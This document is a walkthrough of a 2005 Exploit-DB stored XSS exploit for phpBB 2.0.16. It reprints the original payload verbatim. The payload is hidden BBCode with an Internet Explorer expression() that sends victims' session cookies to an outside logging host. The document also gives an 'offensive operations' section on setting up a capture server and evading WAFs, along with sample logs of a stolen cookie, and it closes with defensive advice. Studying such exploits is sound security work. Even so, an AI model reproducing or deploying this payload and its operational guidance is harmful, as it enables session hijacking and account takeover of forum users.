Understanding phpBB 2.0.16 XSS for Cookie Disclosure

What this paper is

This paper details a Cross-Site Scripting (XSS) vulnerability in phpBB version 2.0.16. The exploit leverages this vulnerability to steal user cookies by embedding malicious JavaScript within a forum post. When another user views this post, the embedded script executes in their browser, sending their session cookie to a server controlled by the attacker.

Simple technical breakdown

The core of the exploit is a specially crafted HTML/JavaScript snippet. This snippet is designed to be posted as a message on a phpBB forum.

1. Malicious HTML/JavaScript: The attacker crafts a message that includes HTML tags with specific styling and JavaScript.
2. this.sss and eval(): The style='top:expression(eval(this.sss));' part is a classic Internet Explorer-specific XSS vector. It tells the browser to execute JavaScript stored in the sss attribute when the element's top style is evaluated.
3. new Image() and document.cookie: The sss attribute contains JavaScript code: i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;. This code creates a new image object and sets its src attribute to a URL. Crucially, it appends the victim's document.cookie (their session cookie) to this URL.
4. Attacker's Server: The URL http://www.milw0rm.com/cgi-bin/shell.jpg? points to a server controlled by the attacker. When the victim's browser tries to load this "image," it actually sends an HTTP GET request to the attacker's server, including the victim's cookie in the query string.
5. Cookie Capture: The attacker's server (in this case, milw0rm.com) is configured to log incoming requests, effectively capturing the cookie data.

Complete code and payload walkthrough

The provided exploit code is a single block of HTML/JavaScript designed to be embedded within a forum post.

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Let's break down the meaningful parts:

• [color=#EFEFEF]...[/color]: This is likely BBCode, a markup language often used in forums. It sets the text color to a very light gray (#EFEFEF), making the malicious code visually blend in or appear invisible to the user.
• [url]www.ut[url=...]: This indicates nested BBCode [url] tags. The outer [url] is likely intended to wrap the entire malicious link. The inner [url=...] is where the actual exploit payload is embedded.
• www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=...style='font-size:0;: This is the core of the XSS payload, disguised within HTML attributes.
  • www.s='': This part is a bit unusual. It might be an attempt to create a dummy attribute or a placeholder. The www.s itself doesn't have a standard HTML meaning.
  • style='font-size:0;color:#EFEFEF': This applies styles to an element (likely an <a> tag implied by the [url] BBCode). font-size:0; makes the text invisible, and color:#EFEFEF further attempts to hide it.
  • style='top:expression(eval(this.sss));': This is the critical Internet Explorer-specific XSS vector.
    • expression(): This is a proprietary CSS extension in older versions of Internet Explorer that allows JavaScript execution.
    • eval(this.sss): This tells IE to take the content of the sss attribute of the current element (this) and execute it as JavaScript code.
  • sss=i=new//Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null``**: This is the JavaScript code that will be executed by eval(this.sss).
    • i=new/**/Image();: Creates a new JavaScript Image object. This object is typically used for preloading images, but here it's used to make an HTTP request. The /**/ is a comment that helps obfuscate the code.
    • i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;: This is the payload delivery mechanism.
      • i.src: Sets the source URL for the image object.
      • 'http://www.milw0rm.com/cgi-bin/shell.jpg?': This is the attacker's server endpoint. The .jpg extension is a common disguise for a script that logs GET requests.
      • +document.cookie: This concatenates the victim's browser cookies to the URL. When the browser attempts to load this URL, the cookies are sent as part of the GET request's query string.
    • this.sss=null: After the script has executed, it sets the sss attribute to null. This is a cleanup step, potentially to prevent re-execution or to make the element less conspicuous.
  • style='font-size:0;': Another style to ensure the element is invisible.
  • ][/url][/url]: These are the closing BBCode tags.

Mapping list:

• [color=#EFEFEF]...[/color] -> Visually hides the malicious content by setting text color to light gray.
• [url]...[/url] -> BBCode for creating a hyperlink, used here to wrap the exploit.
• [url=...] -> BBCode for creating a hyperlink with a specific URL, used to embed the exploit payload.
• style='font-size:0;' -> Makes the rendered HTML element's text invisible.
• style='top:expression(eval(this.sss));' -> Internet Explorer-specific CSS that executes JavaScript from the sss attribute.
• sss=i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`` -> The JavaScript payload that creates an image object and sends the victim's cookies to the attacker's server.
• i=new/**/Image(); -> Creates a JavaScript Image object.
• i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie; -> The core cookie exfiltration logic.
• document.cookie -> JavaScript property that retrieves the cookies for the current document.
• http://www.milw0rm.com/cgi-bin/shell.jpg? -> The attacker-controlled server endpoint designed to log incoming GET requests.
• this.sss=null -> Cleans up the sss attribute after execution.

Practical details for offensive operations teams

• Required Access Level: Low. This is a stored XSS vulnerability. The attacker only needs the ability to post a message on the phpBB forum. No administrative privileges are required.
• Lab Preconditions:
  • A vulnerable phpBB 2.0.16 installation.
  • A controlled server (e.g., a VPS, a simple web server) configured to log incoming HTTP GET requests. The exploit expects a URL like http://attacker.com/cgi-bin/shell.jpg? where shell.jpg is a placeholder and the server logs the full query string.
  • The attacker needs to know the target forum's URL.
• Tooling Assumptions:
  • A web browser capable of rendering the BBCode and executing the JavaScript (specifically, older versions of Internet Explorer are targeted by expression()). Modern browsers might not execute expression() or might have protections against it.
  • A text editor for crafting the BBCode.
  • A server-side script (e.g., a simple Python Flask app, PHP script, or even just Apache/Nginx logging configuration) to capture the logged cookies.
• Execution Pitfalls:
  • Browser Compatibility: The expression() CSS function is primarily an Internet Explorer feature. Users with other browsers (Firefox, Chrome, Safari) will not be vulnerable to this specific payload.
  • WAF/IDS Evasion: Modern Web Application Firewalls (WAFs) and Intrusion Detection Systems (IDS) are highly likely to detect and block such payloads, especially the expression() and document.cookie patterns. Obfuscation techniques might be necessary for older or less sophisticated defenses.
  • BBCode Filtering: The phpBB installation might have filters that sanitize or disallow certain BBCode tags or HTML attributes, preventing the exploit from being posted or rendered correctly.
  • Cookie Expiration/HttpOnly: If the target cookies have the HttpOnly flag set, JavaScript cannot access them, rendering this exploit ineffective. Similarly, if cookies have already expired, there's nothing to steal.
  • Attacker Server Availability: The attacker's logging server must be online and accessible when the victim views the post.
  • Payload Delivery: The exploit relies on the victim viewing the crafted post. This might require social engineering or waiting for users to browse the forum.
• Telemetry:
  • Victim's Browser: An HTTP GET request originating from the victim's IP address to the attacker's logging server. The request will contain a URL with the victim's session cookie in the query string.
  • Attacker's Server Logs: The attacker's server will log the incoming GET request, showing the victim's IP, user agent, and the full URL including the stolen cookie.
  • phpBB Server Logs: Potentially, the phpBB server might log the creation of the malicious post. However, the exploit itself doesn't directly interact with the phpBB server in a way that would generate significant, unique logs beyond the post creation.

Where this was used and when

This exploit targets phpBB version 2.0.16, which was released around 2005. The exploit paper itself was published on July 8, 2005. Therefore, this type of attack would have been relevant in the mid-2000s. phpBB 2.x was a very popular forum software at the time, making it a common target for web application vulnerabilities. Exploits like this were frequently used by defacement groups and black-hat hackers to gain unauthorized access to user accounts on compromised forums.

Defensive lessons for modern teams

• Input Validation and Sanitization: Always sanitize user-provided input, especially when it's displayed on web pages. This includes stripping or encoding potentially dangerous HTML and JavaScript.
• Content Security Policy (CSP): Implement a strong CSP to restrict the sources from which scripts can be loaded and executed. This can prevent inline scripts and eval() from running.
• HttpOnly Cookies: Ensure that sensitive session cookies are marked with the HttpOnly flag. This prevents JavaScript from accessing them, mitigating the impact of XSS vulnerabilities.
• Browser Security Features: Keep browsers updated. Modern browsers have built-in XSS filters and protections that can block many older XSS vectors.
• Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common XSS patterns.
• Regular Software Updates: Keep all web applications and their dependencies (like phpBB) updated to the latest secure versions. This vulnerability is specific to an old, unsupported version.
• Awareness Training: Educate users about the risks of clicking on suspicious links or viewing content from untrusted sources.

ASCII visual (if applicable)

This exploit is a client-side attack that relies on social engineering (getting users to view a post) and browser rendering. A simple flow diagram can illustrate the cookie exfiltration:

+-----------------+       +-----------------+       +-------------------+
| Victim's Browser| ----> | Malicious Post  | ----> | Attacker's Server |
| (IE < 8)        |       | (phpBB Forum)   |       | (Logging Requests)|
+-----------------+       +-----------------+       +-------------------+
        |                                                     ^
        | 1. Renders HTML/JS                                  |
        | 2. Executes JS (eval(this.sss))                     |
        | 3. Accesses document.cookie                          |
        | 4. Creates Image object                             |
        | 5. Sends GET request with cookie                    |
        |    to attacker.com/cgi-bin/shell.jpg?cookie_data   |
        +-----------------------------------------------------+

Source references

• Exploit-DB Paper: https://www.exploit-db.com/papers/1095
• Original Source Code: Provided within the paper.

Original Exploit-DB Content (Verbatim)

/*
1) Change milw0rm.com to your domain.com
2) Post the below code into a new message.

Example Output:
***.**.***.*** - - [09/Jul/2005:03:09:13 -0500] 
"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"

/str0ke
*/


******************************************************************************************************
*					CCTEAM PhpBB 2.0.16 XSS EXPLOIT                              *
*                                           Powered by D|ablo CCTEAM                                 *
******************************************************************************************************
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

******************************************************************************************************
*				               http://ccteam.ru/                                     *
*                                             http://defacers.ru/                                    *
******************************************************************************************************

# milw0rm.com [2005-07-08]